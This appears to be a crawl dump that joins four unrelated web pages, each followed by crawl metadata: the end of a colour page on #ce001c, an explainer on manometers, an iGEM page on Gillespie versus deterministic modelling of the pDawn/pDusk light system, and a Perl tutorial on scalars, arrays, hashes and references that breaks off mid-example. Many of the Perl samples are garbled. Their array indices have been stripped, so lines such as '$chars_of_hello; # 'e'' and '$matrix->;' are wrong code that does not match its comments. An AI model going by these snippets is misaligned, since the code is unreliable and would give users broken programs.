`rgb(88,0,12)``\n• #6c000f\n``#6c000f` `rgb(108,0,15)``\n• #800011\n``#800011` `rgb(128,0,17)``\n• #930014\n``#930014` `rgb(147,0,20)``\n• #a70017\n``#a70017` `rgb(167,0,23)``\n• #ba0019\n``#ba0019` `rgb(186,0,25)``\n• #ce001c\n``#ce001c` `rgb(206,0,28)``\n• #e2001f\n``#e2001f` `rgb(226,0,31)``\n• #f50021\n``#f50021` `rgb(245,0,33)``\n• #ff0a2b\n``#ff0a2b` `rgb(255,10,43)``\n• #ff1d3c\n``#ff1d3c` `rgb(255,29,60)``\n• #ff314d\n``#ff314d` `rgb(255,49,77)``\n• #ff455e\n``#ff455e` `rgb(255,69,94)``\n• #ff586f\n``#ff586f` `rgb(255,88,111)``\n• #ff6c80\n``#ff6c80` `rgb(255,108,128)``\n• #ff8091\n``#ff8091` `rgb(255,128,145)``\n• #ff93a2\n``#ff93a2` `rgb(255,147,162)``\n• #ffa7b3\n``#ffa7b3` `rgb(255,167,179)``\n• #ffbac4\n``#ffbac4` `rgb(255,186,196)``\n• #ffced5\n``#ffced5` `rgb(255,206,213)``\n• #ffe2e6\n``#ffe2e6` `rgb(255,226,230)``\n• #fff5f7\n``#fff5f7` `rgb(255,245,247)``\nTint Color Variation\n\n# Tones of #ce001c\n\nA tone is produced by adding gray to any pure hue. In this case, #6f5f61 is the less saturated color, while #ce001c is the most saturated one.\n\n• #6f5f61\n``#6f5f61` `rgb(111,95,97)``\n• #77575b\n``#77575b` `rgb(119,87,91)``\n• #7f4f56\n``#7f4f56` `rgb(127,79,86)``\n• #874750\n``#874750` `rgb(135,71,80)``\n• #8f3f4a\n``#8f3f4a` `rgb(143,63,74)``\n• #973744\n``#973744` `rgb(151,55,68)``\n• #9e303f\n``#9e303f` `rgb(158,48,63)``\n• #a62839\n``#a62839` `rgb(166,40,57)``\n• #ae2033\n``#ae2033` `rgb(174,32,51)``\n• #b6182d\n``#b6182d` `rgb(182,24,45)``\n• #be1028\n``#be1028` `rgb(190,16,40)``\n• #c60822\n``#c60822` `rgb(198,8,34)``\n• #ce001c\n``#ce001c` `rgb(206,0,28)``\nTone Color Variation\n\n# Color Blindness Simulator\n\nBelow, you can see how #ce001c is perceived by people affected by a color vision deficiency. This can be useful if you need to ensure your color combinations are accessible to color-blind users.\n\nMonochromacy\n• Achromatopsia 0.005% of the population\n• Atypical Achromatopsia 0.001% of the population\nDichromacy\n• Protanopia 1% of men\n• Deuteranopia 1% of men\n• Tritanopia 0.001% of the population\nTrichromacy\n• Protanomaly 1% of men, 0.01% of women\n• Deuteranomaly 6% of men, 0.4% of women\n• Tritanomaly 0.01% of the population" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5333142,"math_prob":0.78741443,"size":3645,"snap":"2021-31-2021-39","text_gpt3_token_len":1601,"char_repetition_ratio":0.1395221,"word_repetition_ratio":0.011111111,"special_character_ratio":0.5462277,"punctuation_ratio":0.23094426,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9805923,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-16T20:01:40Z\",\"WARC-Record-ID\":\"<urn:uuid:ade33d02-e577-4a1b-b053-1548e9fe6431>\",\"Content-Length\":\"36083\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2669b712-a32d-46dc-adac-36b005b8fbbf>\",\"WARC-Concurrent-To\":\"<urn:uuid:28a985c3-c7c8-43fe-b1bc-23808604919e>\",\"WARC-IP-Address\":\"178.32.117.56\",\"WARC-Target-URI\":\"https://www.colorhexa.com/ce001c\",\"WARC-Payload-Digest\":\"sha1:6LRJA2BRU6DYSAF7JBOKWEVEJLZ4N2NF\",\"WARC-Block-Digest\":\"sha1:XS5HM3JPLUTKJN75BCXMCJWSXZV2PLCQ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780053717.37_warc_CC-MAIN-20210916174455-20210916204455-00318.warc.gz\"}"}
https://automationforum.co/what-is-a-manometer-and-for-what-purpose-it-is-used/
[ "Pressure Measurement\n\n# What is a manometer and for what purpose it is used?", null, "A manometer is an instrument which is widely used for many industrial applications, this device can be used to measure the pressure difference between two points in a pipe or it can also be used to determine the pressure difference between two pipes. The manometer can measure the pressure by using the relation between the pressure and head. A manometer can be used to measure high pressures and negative pressure, it is also capable to measure differential pressure.\n\nManometer types\n\nTypes of pressure measurement\n\n## What are the characteristics of a manometer?\n\n• It can measure fluid pressure and this device has a tube which would be bent and it would have more than one liquid and their density would be different\n• The measurement is done by using the known and unknown pressure of the liquid and it would be located at the different end of the tube\n• The differential pressure manometer is only used when we need to know the difference between the two pressure\n• This device can measure static pressure\n\n## What are the properties of manometric fluids?\n\n• It would have the good chemical stability\n• Viscosity and capillary constant will be less\n• The vapor pressure and volatility will be less\n• Thermal expansion would have low co-efficient\n\n### How does a manometer work, and what is the principle of manometer? How is a manometer used to measure pressure?\n\nThe manometer working is based on hydrostatic balance principle mostly a manometer would have a reservoir and it will contain liquid. The source will be connected to the reservoir so that the pressure can be measured. The reservoir will be connected to a column and the column will be exposed to the atmospheric pressure. Manometers could have sealed or unsealed columns, gauge pressure can be measured by using an open column manometer. Absolute pressure can be measured by using a sealed column manometer and these manometers can also be used to measure vacuum.\n\nIf we connect the manometer to a process there would be variations in the liquid level of the column, and these variations will be dependent on the pressure source that is to be measured. We should know the liquid type in the column, according to the type of the liquid used there could be a rise or fall according to the pressure, and we should also know the specific gravity to do the measurement properly.\n\n### What are the types of manometer?\n\nClassification of manometers\n\nThe manometers can be classified into two types they are simple manometer and differential manometer.\n\nSimple manometer\n\nThis type of manometer can measure the pressure of the fluid at a point in the pipe the types of simple manometers are piezometer, U-tube manometer, and single column manometer.\n\nDifferential manometer\n\nThis type of manometer measures the pressure difference between two points, the types of differential manometers are U-tube differential manometer, Inverted U-tube differential manometer.\n\nPiezometer\n\nA piezometer is a simple manometer, it is used to measure the pressure inside the pipe that has liquid. This device has a vertical tube and its operation is based on the principle of hydrostatic equilibrium. The one end of this device glass tube will be connected to the point in which the pressure is to be measured and the other end will be opened to the atmosphere. The pressure rise will be according to the pressure at that point and this pressure can be measured by the liquid height in the tube.\n\nWhat are the disadvantages of the piezometer?\n\n• It can only measure the gauge pressure and cannot be used to measure the negative pressure\n• The pressure of the gas cannot be measured by this device\n\nU- tube manometer\n\nThis device is composed of a U-shaped glass and its one end is opened to the atmosphere and the other end is connected to the point in which the pressure is to be measured. This device is capable to measure the large pressures in the lighter liquids. This device tube will be filled with mercury or can be considered as the manometric fluid and this device can be used to measure the gas and liquid.\n\nWhat are the applications of the U-tube manometer?\n\n• It can be used for low range pressure measurement\n• Widely used in laboratories\n• It can also be used to detect the pressure drop in valves\n\nInverted U-tube manometer\n\nIn this type of manometer, an inverted U-tube is used, it can be used to measure the difference of low pressure. This can do accurate measurements, the both end of the tube will be connected to the point in which the pressure difference is to be determined.\n\n#### What are the factors that affect the accuracy of the manometer?\n\n• We must consider the type of liquid in the column for accurate measurement\n• The specific gravity of the liquid in the column must be known\n• The accuracy of the manometer is also depended on the liquid shape at the interference between the liquid and air in the column\n• The column liquid quality is important\n• The characteristic of the indicating fluid is an important factor the fluid must have good wetting characteristics\n\n#### How is a simple manometer different from a differential manometer?\n\nA simple manometer can only measure the pressure at a point, while the differential manometer is used to determine the pressure between two points. In a simple manometer, one of the limbs is open to the air and the other one is connected to the point, while in a differential manometer the limbs are connected to two points. In the case of a simple manometer, the pressure is determined by the difference of level of fluid flowing through the pipe, while in a differential manometer the difference of pressure is determined by measuring the difference of the levels of the manometer liquid.\n\n#### What are the advantages of a manometer?\n\n• It has good accuracy and sensitivity\n• Maintenance is less\n• Vibration is not a problem for this device\n• It is easy to manufacture this device and it costs very less\n• This device can be used for low pressure and low differential pressure\n• The sensitivity of this device can be easily changed according to our need\n\n#### What are the limitations of the manometer?\n\n• It is not compact and has a big size\n• It could be easily damaged because it is fragile\n• The measurement of the manometer is affected by variations in temperature, gravity, and altitude\n• Because of the surface tension of the manometric fluid, a capillary effect is created\n• Dynamic response is not good\n\n#### What are the applications of a manometer?\n\n• It can be used for pressure monitoring applications\n• It can also be used to monitor the air and gas pressure for the compressor\n• A manometer can be used to measure the static pressure and vacuum\n• Mercury absolute manometers are used in power plants\n• This device is used for whether studies, research labs, gas analysis, etc" ]
[ null, "https://cdn.automationforum.co/uploads/2020/10/Untitled-20.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9437103,"math_prob":0.9353398,"size":6691,"snap":"2022-40-2023-06","text_gpt3_token_len":1360,"char_repetition_ratio":0.23119485,"word_repetition_ratio":0.07394669,"special_character_ratio":0.19010611,"punctuation_ratio":0.05232558,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9795148,"pos_list":[0,1,2],"im_url_duplicate_count":[null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-02-08T17:50:49Z\",\"WARC-Record-ID\":\"<urn:uuid:f7d471a2-794d-42da-810a-dee80e0b2548>\",\"Content-Length\":\"179987\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:8beab037-60ee-4b7d-b2ab-c5aef579a556>\",\"WARC-Concurrent-To\":\"<urn:uuid:b073e1e0-69fa-41b0-b3f0-55d185a335d2>\",\"WARC-IP-Address\":\"104.21.38.128\",\"WARC-Target-URI\":\"https://automationforum.co/what-is-a-manometer-and-for-what-purpose-it-is-used/\",\"WARC-Payload-Digest\":\"sha1:MJ7EY737Q7TEZRDRRWHAWHKDKAJC7WB4\",\"WARC-Block-Digest\":\"sha1:O54NFZRU66CHO2WRIULIVI335WTOGUTG\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764500837.65_warc_CC-MAIN-20230208155417-20230208185417-00209.warc.gz\"}"}
http://2018.igem.org/Team:CUNY_Kingsborough/Light_Operon
[ "# Team:CUNY Kingsborough/Light Operon", null, "# Light Operon\n\n## 1. Introduction\n\nA deterministic model of differential equations over a continuous time interval is generally easy to implement using known numerical methods. However, the equations alone do not account for the variability in expression that we often observe at low molecular count. In other words, deterministic simulations fail to capture the actual physical basis of the reaction (Gillespie 1977; Wilkinson 2012). This is due to the intrinsic and extrinsic noise that occurs at low intracellular molecular counts; interactions do not follow traditionally defined constant parameters which limits the accurate characterization of a genetic system (Elowitz et al., 2002).\n\nIt then becomes essential when characterizing a genetic system to have a deterministic approach (to capture the large average overtime) in addition to a stochastic approach. A stochastic approach allows one to model the probabilistic trajectory based on the initial conditions. One commonly used stochastic algorithm is the Gillespie Algorithm— a simple but powerful approach to simulation that takes into account the initial state of the reactants, the reaction rate and the number of molecules present for a reaction with each timed step of the reaction drawn from a probability distribution (Gillespie 1977).\n\nAs a working example, we will be working with the pDawn and pDusk operon (BBa K161609 and BBa K1075044). Many teams have made either the pDawn/pDusk system as their inducer (IONIS Paris 2015, Wageningen 2016, NUS Singapore 2017, Cornell 2017, Kingsborough 2017). In 2017, NUS Singapore 2017 and Kingsborough 2017 used the pDawn/pDusk inducer to induce expression of MazF to induce cell death. To our knowledge, there is no literature or past iGEM project exploring a stochastic model of the pDawn/pDusk system at low molecule count.\n\n## 2. Methods\n\nIn order to improve reproducibility and to build on past iGEM teams’ efforts, we used the differential equations and parameters described in the 2016 Wageningen iGEM Team’s kill switch design. Using the “smfsb” package in R for stochastic simulations and the NDSolve function in Mathematica, we modeled the 3 light-sensitive states of the Yf1 homodimer over a period of 20 hours. Yll frequency simulation was done through the \"smfsb\" package in R and simulated a hundred times. Histograms were made through Excel.\n\n### Equations, Constants, & Parameters\n\n1. $$\\frac{dy_{DD}}{dt}=k_1+ 2\\cdot k_2 \\cdot y_{DL,LD} - 2 \\cdot (N\\cdot k_3) \\cdot y_{DD} - \\beta_1 \\cdot y_{DD}$$\n2. $$\\frac{dy_{DL,LD}}{dt}=2 \\cdot (N \\cdot k_3) \\cdot y_{DD} + 2 \\cdot k_2 \\cdot y_{LL} - 2 \\cdot k_2 \\cdot y_{DL,LD} - 2 \\cdot (N \\cdot k_3) \\cdot y_{DL,LD} - \\beta_2 \\cdot y_{DL,LD}$$\n3. $$\\frac{dy_{LL}}{dt} = 2 \\cdot (N \\cdot k_3) \\cdot y_{DL,LD} - 2\\cdot k_2 \\cdot y_{LL} - \\beta_3 \\cdot y_{LL}$$\nConstant/Parameter Value Description\n$$N$$ Variable of $$\\frac{\\mu \\cdot mol}{m^2 \\cdot h}$$ Concentration of light\n$$k_1$$ $$2.6921 \\frac{\\mu \\cdot mol}{hr}$$ Production rate of $$y_{DD}$$\n$$k_2$$ $$0.0008 \\frac{1}{hr}$$ Relaxtion rate of $$y_{DL,LD}$$ and $$y_{LL}$$\n$$k_3$$ $$0.4219 \\frac{m^2}{\\mu \\cdot mol}$$ Conversion cross-section of light intensity activated production rate of $$y_{DL,LD}$$ and $$y_{LL}$$.\n$$\\beta_1$$ $$0.3049 \\frac{1}{hr}$$ Degradation rate of $$y_{DD}$$\n$$\\beta_2$$ $$0.8406 \\frac{1}{hr}$$ Degradation rate of $$y_{DL,LD}$$\n$$\\beta_3$$ $$0.1477 \\frac{1}{hr}$$ Degradation rate of $$y_{DD}$$\n\n### Post-Reaction Pre-Reaction Matrix for Gillespie", null, "", null, "## 3. Results\n\nClick on any of the images to view full size.\n\nIn the stochastic results, we observe a much greater variation in expression at 95 $$\\mu mol$$ compared to 948 $$\\mu mol$$. Contrast this to the deterministic model in which the low/high concentration plots are identical with respect to a scaling factor. Gillespie causes step-behavior in the concentration. Although the plot of 948 $$\\mu mol$$ appears to be much smoother, we would see the same “cliffs” that we observe at 95 $$\\mu mol$$ by stretching the y-axis enough. The impact of a fixed gain or loss in concentration is much more “felt” in a small system than it would be in a large system (here size is relative to the initial concentration of Yf1). If we only cared about modeling a large, stable concentration however, the deterministic model clearly suffices to capture the general behavior and is less computationally expensive.\n\n### 1. Starting concentration of 95 Yf1 molecules (Gillespie)\n\nyDD (Dark-Dark state); yDL/LD (Dark-Light state); yLL (Light-Light state)\n\n## Figures\n\nHistograms of the frequency of Yll given a starting concentration of Ydd after a simulation of 100 times. Light is produced at a constant amount-(1ɥmol and 10 ɥmol). Frequency distribution is obtained around the time of full activation.\n\n### 2. Starting concentration of 948 Yf1 molecules (Gillespie)\n\nyDD (Dark-Dark state); yDL/LD (Dark-Light state); yLL (Light-Light state)\n\n### 3. Starting concentration of 95 and 948 Yf1 molecules (deterministic)\n\n(Left) Starting concentration of 95 Yf1 molecules; (Right) Starting concentration of 948 Yf1 molecules\nyDD (Dark-Dark state); yDL/LD (Dark-Light state); yLL (Light-Light state)\n\n### 5. Frequency of Yll at Starting Concentration of 948 Ydd\n\n(Left) Constant light at 1 mumol; (Right) Constant light at 10 mumol\n\n### 6. Frequency of Yll at Starting Concentration of 95 Ydd\n\n(Left) Constant light at 1 mumol; (Right) Constant light at 10 mumol\n\n### Citations\n\nElowitz, M. B., Levine, A. J., Siggia, E. D. & Swain, P. S. (2002), ‘Stochastic gene expression in a single cell’, Science 297(5584), 1183–1186. (Wilkinson 324-325)\n\nGillespie, D. T. (1977), ‘Exact stochastic simulation of coupled chemical reactions’, Journal of Physical Chemistry 81, 2340–2361.\n\nMöglich, Andreas, Rebecca A. Ayers, and Keith Moffat. 2009. “Design and Signaling Mechanism of Light-Regulated Histidine Kinases.\" Journal of Molecular Biology 385(5):1433–44. Retrieved (http://dx.doi.org/10.1016/j.jmb.2008.12.017).\n\nOhlendorf, Robert, Roee R. Vidavski, Avigdor Eldar, Keith Moffat, and Andreas Möglich. 2012. “From Dusk till Dawn: One-Plasmid Systems for Light-Regulated Gene Expression.\" Journal of Molecular Biology 416(4):534–42. Retrieved (http://dx.doi.org/10.1016/j.jmb.2012.01.001)\n\nWilkinson, D. J. (2011) Stochastic modelling for systems biology, second edition, Boca Raton, Florida: Chapman and Hall/CRC Press.\n\nhttp://2016.igem.org/Team:Wageningen_UR/Description>" ]
[ null, "http://2018.igem.org/wiki/images/0/0e/T--CUNY_Kingsborough--2018Logo.jpeg", null, "http://2018.igem.org/wiki/images/c/c0/T--CUNY_Kingsborough--reactionmatrixdiagram2.png", null, "http://2018.igem.org/wiki/images/4/4b/T--CUNY_Kingsborough--reactionmatrix.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7974825,"math_prob":0.98888665,"size":6252,"snap":"2020-10-2020-16","text_gpt3_token_len":1770,"char_repetition_ratio":0.12211908,"word_repetition_ratio":0.049668875,"special_character_ratio":0.28918746,"punctuation_ratio":0.12928082,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99589545,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,9,null,2,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-02-25T09:03:42Z\",\"WARC-Record-ID\":\"<urn:uuid:25415cb2-bce1-4057-a523-2124632fbc02>\",\"Content-Length\":\"33642\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d7166f85-5dc8-4197-a00e-c307332d3069>\",\"WARC-Concurrent-To\":\"<urn:uuid:53d698c6-dbb9-4dfe-b291-2a75c15a77fe>\",\"WARC-IP-Address\":\"148.62.49.124\",\"WARC-Target-URI\":\"http://2018.igem.org/Team:CUNY_Kingsborough/Light_Operon\",\"WARC-Payload-Digest\":\"sha1:AEISWJOWESWXED2ICGOLSGF4VY7FCURM\",\"WARC-Block-Digest\":\"sha1:L3CT7T5SR6QQ6OAZTF35MVEL5WYDWDBL\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-10/CC-MAIN-2020-10_segments_1581875146064.76_warc_CC-MAIN-20200225080028-20200225110028-00437.warc.gz\"}"}
https://sodocumentation.net/perl/topic/1566/variables
[ "# Perl LanguageVariables\n\n## Syntax\n\n• my # Lexical declaration\n• our # Global declaration\n• \\$foo # Scalar\n• @foo # Array\n• \\$#foo # Array Last-Index\n• %foo # Hash\n• \\${\\$foo} # Scalar De-Reference\n• @{\\$foo} # Array De-Reference\n• \\$#{\\$foo} # Array-DeRef Last-Index\n• %{\\$foo} # Hash De-Reference\n• \\$foo[\\$index] # Array get indexed\n• \\${\\$foo}[\\$index] # Array De-Reference and get indexed.\n• \\$foo->[\\$index] # Array De-Reference and get indexed ( Simplified )\n• \\$foo{\\$key} # Hash get value for key\n• \\${\\$foo}{\\$key} # Hash Dereference and get value for key\n• \\$foo->{\\$key} # Hash Dereference and get value for key ( Simplified )\n• \\\\$x # Reference to Scalar\n• \\@x # Reference to Array\n• \\%x # Reference to Hash\n• =[ ] # Reference to Anonymous Array (Inline)\n• ={ } # Reference to Anonymous Hash (Inline)\n\n## Scalars\n\nScalars are Perl's most basic data type. They're marked with the sigil `\\$` and hold a single value of one of three types:\n\n• a number (`3`, `42`, `3.141`, etc.)\n• a string (`'hi'`, `\"abc\"`, etc.)\n• a reference to a variable (see other examples).\n``````my \\$integer = 3; # number\nmy \\$string = \"Hello World\"; # string\nmy \\$reference = \\\\$string; # reference to \\$string\n``````\n\nPerl converts between numbers and strings on the fly, based on what a particular operator expects.\n\n``````my \\$number = '41'; # string '41'\nmy \\$meaning = \\$number + 1; # number 42\nmy \\$sadness = '20 apples'; # string '20 apples'\nmy \\$danger = \\$sadness * 2; # number '40', raises warning\n``````\n\nWhen converting a string into a number, Perl takes as many digits from the front of a string as it can – hence why `20 apples` is converted into `20` in the last line.\n\nBased on whether you want to treat the contents of a scalar as a string or a number, you need to use different operators. Do not mix them.\n\n``````# String comparison # Number comparison\n'Potato' eq 'Potato'; 42 == 42;\n'Potato' ne 'Pomato'; 42 != 24;\n'Camel' lt 'Potato'; 41 < 42;\n'Zombie' gt 'Potato'; 43 > 42;\n\n# String concatenation # Number summation\n'Banana' . 'phone'; 23 + 19;\n\n# String repetition # Number multiplication\n'nan' x 3; 6 * 7;\n``````\n\nAttempting to use string operations on numbers will not raise warnings; attempting to use number operations on non-numeric strings will. Do be aware that some non-digit strings such as `'inf'`, `'nan'`, `'0 but true'` count as numbers.\n\n## Arrays\n\nArrays store an ordered sequence of values. You can access the contents by index, or iterate over them. The values will stay in the order you filled them in.\n\n``````my @numbers_to_ten = (1,2,3,4,5,6,7,8,9,10); # More conveniently: (1..10)\nmy @chars_of_hello = ('h','e','l','l','o');\nmy @word_list = ('Hello','World');\n\n# Note the sigil: access an @array item with \\$array[index]\nmy \\$second_char_of_hello = \\$chars_of_hello; # 'e'\n\n# Use negative indices to count from the end (with -1 being last)\nmy \\$last_char_of_hello = \\$chars_of_hello[-1];\n\n# Assign an array to a scalar to get the length of the array\nmy \\$length_of_array = @chars_of_hello; # 5\n\n# You can use \\$# to get the last index of an array, and confuse Stack Overflow\nmy \\$last_index_of_array = \\$#chars_of_hello; # 4\n\n# You can also access multiple elements of an array at the same time\n# This is called \"array slice\"\n# Since this returns multiple values, the sigil to use here on the RHS is @\nmy @some_chars_of_hello = @chars_of_hello[1..3]; # ('H', 'e', 'l')\nmy @out_of_order_chars = @chars_of_hello[1,4,2]; # ('e', 'o', 'l')\n\n# In Python you can say array[1:-1] to get all elements but first and last\n# Not so in Perl: (1..-1) is an empty list. Use \\$# instead\nmy @empty_list = @chars_of_hello[1..-1]; # ()\nmy @inner_chars_of_hello = @chars_of_hello[1..\\$#chars_of_hello-1]; # ('e','l','l')\n\n# Access beyond the end of the array yields undef, not an error\nmy \\$undef = \\$chars_of_hello; # undef\n``````\n\nArrays are mutable:\n\n``````use utf8; # necessary because this snippet is utf-8\n\\$chars_of_hello = 'u'; # ('h','u','l','l','o')\npush @chars_of_hello, ('!', '!'); # ('h','u','l','l','o','!','!')\npop @chars_of_hello; # ('h','u','l','l','o','!')\nshift @chars_of_hello; # ('u','l','l','o','!')\nunshift @chars_of_hello, ('¡', 'H'); # ('¡','H','u','l','l','o','!')\n@chars_of_hello[2..5] = ('O','L','A'); # ('¡','H','O','L','A',undef,'!') whoops!\ndelete \\$chars_of_hello[-2]; # ('¡','H','O','L','A', '!')\n\n# Setting elements beyond the end of an array does not result in an error\n# The array is extended with undef's as necessary. This is \"autovivification.\"\nmy @array; # ()\nmy @array = 'x'; # (undef, undef, undef, 'x')\n``````\n\nFinally, you can loop over the contents of an array:\n\n``````use v5.10; # necessary for 'say'\nfor my \\$number (@numbers_to_ten) {\nsay \\$number ** 2;\n}\n``````\n\nWhen used as booleans, arrays are true if they are not empty.\n\n## Hashes\n\nHashes can be understood as lookup-tables. You can access its contents by specifiying a key for each of them. Keys must be strings. If they're not, they will be converted to strings.\n\nIf you give the hash simply a known key, it will serve you its value.\n\n``````# Elements are in (key, value, key, value) sequence\nmy %inhabitants_of = (\"London\", 8674000, \"Paris\", 2244000);\n\n# You can save some typing and gain in clarity by using the \"fat comma\"\n# syntactical sugar. It behaves like a comma and quotes what's on the left.\nmy %translations_of_hello = (spanish => 'Hola', german => 'Hallo', swedish => 'Hej');\n``````\n\nIn the following example, note the brackets and sigil: you access an element of `%hash` using `\\$hash{key}` because the value you want is a scalar. Some consider it good practice to quote the key while others find this style visually noisy. Quoting is only required for keys that could be mistaken for expressions like `\\$hash{'some-key'}`\n\n``````my \\$greeting = \\$translations_of_hello{'spanish'};\n``````\n\nWhile Perl by default will try to use barewords as strings, `+` modifier can also be used to indicate to Perl that key should not be interpolated but executed with result of execution being used as a key:\n\n``````my %employee = ( name => 'John Doe', shift => 'night' );\n# this example will print 'night'\nprint \\$employee{shift};\n\n# but this one will execute [shift], extracting first element from @_,\n# and use result as a key\nprint \\$employee{+shift};\n``````\n\nLike with arrays, you can access multiple hash elements at the same time. This is called a hash slice. The resulting value is a list, so use the `@` sigil:\n\n``````my @words = @translations_of_hello{'spanish', 'german'}; # ('Hola', 'Hallo')\n``````\n\nIterate over the keys of an hash with `keys` `keys` will return items in a random order. Combine with `sort` if you wish.\n\n``````for my \\$lang (sort keys %translations_of_hello) {\nsay \\$translations_of_hello{\\$lang};\n}\n``````\n\nIf you do not actually need the keys like in the previous example, `values` returns the hash's values directly:\n\n``````for my \\$translation (values %translations_of_hello) {\nsay \\$translation;\n}\n``````\n\nYou can also use a while loop with `each` to iterate over the hash. This way, you will get both the key and the value at the same time, without a separate value lookup. Its use is however discouraged, as `each` can break in mistifying ways.\n\n``````# DISCOURAGED\nwhile (my (\\$lang, \\$translation) = each %translations_of_hello) {\nsay \\$translation;\n}\n``````\n\nAccess to unset elements returns undef, not an error:\n\n``````my \\$italian = \\$translations_of_hello{'italian'}; # undef\n``````\n\n`map` and list flattening can be used to create hashes out of arrays. This is a popular way to create a 'set' of values, e.g. to quickly check whether a value is in `@elems`. This operation usually takes O(n) time (i.e. proportional to the number of elements) but can be done in constant time (O(1)) by turning the list into a hash:\n\n``````@elems = qw(x y x z t);\nmy %set = map { \\$_ => 1 } @elems; # (x, 1, y, 1, t, 1)\nmy \\$y_membership = \\$set{'y'}; # 1\nmy \\$w_membership = \\$set{'w'}; # undef\n``````\n\nThis requires some explanation. The contents of `@elems` get read into a list, which is processed by `map`. `map` accepts a code block that gets called for each value of its input list; the value of the element is available for use in `\\$_`. Our code block returns two list elements for each input element: `\\$_`, the input element, and `1`, just some value. Once you account for list flattening, the outcome is that `map { \\$_ => 1 } @elems` turns `qw(x y x z t)` into `(x => 1, y => 1, x => 1, z => 1, t => 1)`.\n\nAs those elements get assigned into the hash, odd elements become hash keys and even elements become hash values. When a key is specified multiple times in a list to be assigned to a hash, the last value wins. This effectively discards duplicates.\n\nA faster way to turn a list into a hash uses assignment to a hash slice. It uses the `x` operator to multiply the single-element list `(1)` by the size of `@elems`, so there is a `1` value for each of the keys in the slice on the left hand side:\n\n``````@elems = qw(x y x z t);\nmy %set;\n@set{@elems} = (1) x @elems;\n``````\n\nThe following application of hashes also exploits the fact that hashes and lists can often be used interchangeably to implement named function args:\n\n``````sub hash_args {\nmy %args = @_;\nmy %defaults = (foo => 1, bar => 0);\nmy %overrides = (__unsafe => 0);\nmy %settings = (%defaults, %args, %overrides);\n}\n\n# This function can then be called like this:\nhash_args(foo => 5, bar => 3); # (foo => 5, bar => 3, __unsafe ==> 0)\nhash_args(); # (foo => 1, bar => 0, __unsafe ==> 0)\nhash_args(__unsafe => 1) # (foo => 1, bar => 0, __unsafe ==> 0)\n``````\n\nWhen used as booleans, hashes are true if they are not empty.\n\n## Scalar References\n\nA reference is a scalar variable (one prefixed by `\\$` ) which “refers to” some other data.\n\n``````my \\$value = \"Hello\";\nmy \\$reference = \\\\$value;\nprint \\$value; # => Hello\nprint \\$reference; # => SCALAR(0x2683310)\n``````\n\nTo get the referred-to data, you de-reference it.\n\n``````say \\${\\$reference}; # Explicit prefix syntax\nsay \\$\\$reference; # The braces can be left out (confusing)\n``````\n5.24.0\n\nNew postfix dereference syntax, available by default from v5.24\n\n``````use v5.24;\nsay \\$reference->\\$*; # New postfix notation\n``````\n\nThis \"de-referenced value\" can then be changed like it was the original variable.\n\n``````\\${\\$reference} =~ s/Hello/World/;\nprint \\${\\$reference}; # => World\nprint \\$value; # => World\n``````\n\nA reference is always truthy – even if the value it refers to is falsy (like `0` or `\"\"`).\n\n## You may want a Scalar Reference If:\n\n• You want to pass a string to a function, and have it modify that string for you without it being a return value.\n\n• You wish to explicitly avoid Perl implicitly copying the contents of a large string at some point in your function passing ( especially relevant on older Perls without copy-on-write strings )\n\n• You wish to disambiguate string-like values with specific meaning, from strings that convey content, for example:\n\n• Disambiguate a file name from file content\n• Disambiguate returned content from a returned error string\n• You wish to implement a lightweight inside out object model, where objects handed to calling code don't carry user visible metadata:\n\n``````our %objects;\nmy \\$next_id = 0;\nsub new {\nmy \\$object_id = \\$next_id++;\n\\$objects{ \\$object_id } = { ... }; # Assign data for object\nmy \\$ref = \\\\$object_id;\nreturn bless( \\$ref, \"MyClass\" );\n}\n``````\n\n## Array References\n\nArray References are scalars (`\\$`) which refer to Arrays.\n\n``````my @array = (\"Hello\"); # Creating array, assigning value from a list\nmy \\$array_reference = \\@array;\n``````\n\nThese can be created more short-hand as follows:\n\n``````my \\$other_array_reference = [\"Hello\"];\n``````\n\nModifying / Using array references require dereferencing them first.\n\n``````my @contents = @{ \\$array_reference }; # Prefix notation\nmy @contents = @\\$array_reference; # Braces can be left out\n``````\n5.24.0\n\nNew postfix dereference syntax, available by default from v5.24\n\n``````use v5.24;\nmy @contents = \\$array_reference->@*; # New postfix notation\n``````\n\nWhen accessing an arrayref's contents by index you can use the `->` syntactical sugar.\n\n``````my @array = qw(one two three); my \\$arrayref = [ qw(one two three) ]\nmy \\$one = \\$array; my \\$one = \\$arrayref->;\n``````\n\nUnlike arrays, arrayrefs can be nested:\n\n``````my @array = ( (1, 0), (0, 1) ) # ONE array of FOUR elements: (1, 0, 0, 1)\nmy @matrix = ( [1, 0], [0, 1] ) # an array of two arrayrefs\nmy \\$matrix = [ [0, 1], [1, 0] ] # an arrayref of arrayrefs\n# There is no namespace conflict between scalars, arrays and hashes\n# so @matrix and \\$matrix _both_ exist at this point and hold different values.\n\nmy @diagonal_1 = (\\$matrix->, \\$matrix->) # uses @matrix\nmy @diagonal_2 = (\\$matrix->->, \\$matrix->->) # uses \\$matrix\n# Since chained []- and {}-access can only happen on references, you can\n# omit some of those arrows.\nmy \\$corner_1 = \\$matrix; # uses @matrix;\nmy \\$corner_2 = \\$matrix->; # uses 